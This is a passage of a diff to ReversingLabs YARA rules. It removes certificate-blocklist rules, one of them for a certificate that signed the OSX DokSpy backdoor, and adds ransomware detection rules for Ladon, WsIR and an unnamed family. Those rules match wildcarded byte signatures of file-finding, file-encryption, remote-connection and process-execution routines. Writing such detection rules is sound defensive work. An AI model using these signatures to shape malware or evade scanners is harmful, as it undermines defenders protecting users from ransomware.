+            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8
+        }
+		$file_extensions_3 = {
+            8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B
+            45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+        }
+		$file_extensions_4 = {
+            0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D
+            95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45
+            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F
+            84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84
+        }
+		$file_extensions_5 = {
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84
+            }
+		$parse_server_commands = {
+            83 F9 ?? 0F 84 E0 00 00 00 50 53 56 57 89 C3 89 D6 89 CF 31 D2 8A 06 8A 56 ?? 3C ?? 74 25 3C ?? 74 3E 3C ?? 74 51 3C ??
+            74 5C 3C ?? 74 76 3C ?? 0F 84 84 00 00 00 3C ?? 0F 84 8B 00 00 00 E9 97 00 00 00 83 F9 ?? 89 D8 7F 0A E8 ?? ?? ?? ?? E9
+            91 00 00 00 89 CA E8 ?? ?? ?? ?? E9 85 00 00 00 83 F9 ?? 89 D8 7F 07 E8 ?? ?? ?? ?? EB 77 89 CA E8 ?? ?? ?? ?? EB 6E 89
+            D8 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F3 EB 5F 55 89 D5 8B 54 2E ?? 89 D8 03 5C 2E ?? 8B 4C 2E ?? 8B 12 E8 62 FF FF FF 4F 7F
+            E8 5D EB 41 55 89 D5 89 D8 03 5C 2E ?? 89 F2 E8 ?? ?? ?? ?? 4F 7F F0 5D EB 2B 89 D8 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F3 EB
+            1C 89 D8 89 F2 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F1 EB 0B 5F 5E 5B 58 B0 ?? E9 ?? ?? ?? ?? 5F 5E 5B 58 C3 8B C0 B9 ?? ?? ??
+            ?? E9 0A FF FF FF C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Developer ID Application: Edouard Roulet (W7J9LRHXTG)" and pe.signatures [ i ] . serial == "12:72:51:b3:2b:9a:50:bd" and 1493769599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $file_extensions_1 and $file_extensions_2 and $file_extensions_3 and $file_extensions_4 and $file_extensions_5 ) and $parse_server_commands )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_48Cad4E6966E22D6 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ladon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing OSX DokSpy backdoor."
+		description = "Yara rule that detects Ladon ransomware."
 		author = "ReversingLabs"
-		id = "22d62d7e-3f76-5f6b-a3f1-a6b087fb63e2"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "ebc8f957-cdcf-54eb-bd02-74088cf51768"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2176-L2192"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ladon.yara#L1-L101"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7733b8a97d9f3538db04309a2e3f9df6cb64930b0b6f7f241c3e629be2dd7804"
+		logic_hash = "979e3f3bf6a67bf10b6bfdd2eeb722d8836096076b7e88c6d4aca041a1a9eecb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ladon"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Developer ID Application: Seven Muller (FUP9692NN6)" and pe.signatures [ i ] . serial == "48:ca:d4:e6:96:6e:22:d6" and 1492732799 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_5E15205F180442Cc6C3C0F03E1A33D9F : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "4a0d995a-37df-52a4-a66f-4bc6c290c10a"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2194-L2210"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1ca238b5da4ff9940425c99f55542c931ccdf0ea3b0a2acbf00ffbbb54171ae0"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66
+            3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2
+            75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ??
+            83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 57 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 85
+            ?? ?? ?? ?? 53 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF 85 DB 74 ?? 90 8B 45 ?? 8B
+            34 B8 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 66 8B 08 66 3B 0E 75 ?? 66 85 C9 74 ??
+            66 8B 48 ?? 66 3B 4E ?? 75 ?? 83 C0 ?? 83 C6 ?? 66 85 C9 75 ?? 33 C0 EB ?? 1B C0 83
+            C8 ?? 85 C0 74 ?? 47 3B FB 72 ?? 8B 75 ?? 8B 7D ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF
+            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? 33 DB 83 F8 ?? 0F
+            95 C3 FF 15 ?? ?? ?? ?? 5E 8B C3 5B 5F 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 75 ?? 33 DB 89 5D ?? E8 ?? ?? ?? ?? 8B F8 83
+            C4 ?? 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 83 3F ?? 0F 85 ?? ?? ?? ?? 53 68 ?? ?? ?? ??
+            FF 77 ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
+            77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
+            77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
+            77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
+            77 ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 89 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 83 3E ?? 0F 85
+            ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ??
+            8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 83 39 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 70
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? FF 75 ?? 33 FF C7 45
+            ?? ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 83 3E ?? 75 ?? 57
+            68 ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? FF 70 ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74
+            ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 7B ?? A1 ??
+            ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 1D ?? ?? ?? ?? 85 F6 74 ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 8B C7 5F 5E 5B 8B E5 5D C3 FF 76 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 78 ?? 85 FF 74 ?? 8B 47 ?? 89 45
+        }
+		$encrypt_files_p2 = {
+            8B 70 ?? 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 04 75 ?? ?? ?? ?? 50 6A ?? FF 15 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 84 9D ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 0C 75
+            ?? ?? ?? ?? 51 50 8D 46 ?? 50 8B 45 ?? FF 70 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 3F
+            43 85 FF 75 ?? 68 ?? ?? ?? ?? C7 84 9D ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 77 ?? 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50
+            6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B C8 89 4D ?? 85 C9 0F 84 ?? ?? ?? ??
+            8B C6 99 6A ?? 2B C2 D1 F8 6A ?? 89 45 ?? 8D 45 ?? 50 51 6A ?? 56 FF 77 ?? FF 15 ??
+            ?? ?? ?? 8B 7D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 57 8B 7D ?? 8B F0 57 56 FF 15 ?? ?? ?? ?? 56 FF 15
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
+            ?? ?? 8B 7D ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 05 ?? ?? ??
+            ?? ?? ?? ?? ?? 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 85 DB 74 ?? FF B4 B5 ??
+            ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 46 3B F3 72 ?? 8B 45 ?? 5F 5E
+            5B 8B E5 5D C3
+        }
+		$remote_connection = {
+            8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B E5 5D C3 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 85 C0 0F 88 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 78 ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ??
+            85 F6 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5E 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ziber Ltd" and pe.signatures [ i ] . serial == "5e:15:20:5f:18:04:42:cc:6c:3c:0f:03:e1:a3:3d:9f" and 1498607999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4C8E3B1613F73542F7106F272094Eb23 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Wsir : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects WsIR ransomware."
 		author = "ReversingLabs"
-		id = "06f79efe-134e-5941-80fe-3b6482ac9668"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "cb4ab736-9421-5b92-b4a5-c5db0b61725a"
+		date = "2022-08-02"
+		modified = "2022-08-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2212-L2228"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.WsIR.yara#L1-L73"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "15c21b783409d904a0b4971dbdcbd0740083d13f3c633ee77c87df46d3aca748"
+		logic_hash = "c22c01f93945c7721ebfe5e7a09c3bf2b9d0ad95740bc0a76b4e61741f61d82c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WsIR"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADD Audit" and pe.signatures [ i ] . serial == "4c:8e:3b:16:13:f7:35:42:f7:10:6f:27:20:94:eb:23" and 1472687999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_2Ce2Bd0Ad3Cfde9Ea73Eec7Ca30400Da : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "b7439b38-c8b7-5dcb-8d10-952862ce3465"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2230-L2246"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a879ecd957acd29e8a5bad6c97cd10453ab857949680b522735bd77eb561d2ee"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53
+            55 8B E9 8D 4C 24 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? C7 84 24 ?? ?? ?? ?? ??
+            ?? ?? ?? 8B 41 ?? 85 C0 74 ?? 8D 54 24 ?? 6A ?? 52 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 00
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 85 C0 0F 95 C3 E8 ?? ?? ?? ??
+            84 DB 74 ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8
+            ?? ?? ?? ?? 8B 4C 24 ?? 8D 44 24 ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75
+            ?? 8D 4C 24 ?? 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 8B B4 24 ?? ??
+            ?? ?? 57 8B 3D ?? ?? ?? ?? BB ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 8D 54 24 ?? 68 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 45 ?? 8D 54 24 ?? 52 6A ?? 8D 8C 24 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 50 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 4C 24 ?? 89 5C 24 ?? FF D7 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ??
+            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 56 6A ?? 68
+            ?? ?? ?? ?? 51 FF D7 8D 4C 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F
+            5E 8B 8C 24 ?? ?? ?? ?? 5D 5B 64 89 0D ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2
+        }
+		$encrypt_files = {
+            FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ??
+            ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ??
+            ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85
+            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ??
+            E9
+        }
+		$exec_proc = {
+            52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ??
+            ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF D3 8D 4C 24 ?? 8D 54 24 ?? 51 52 68 ?? ?? ??
+            ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B
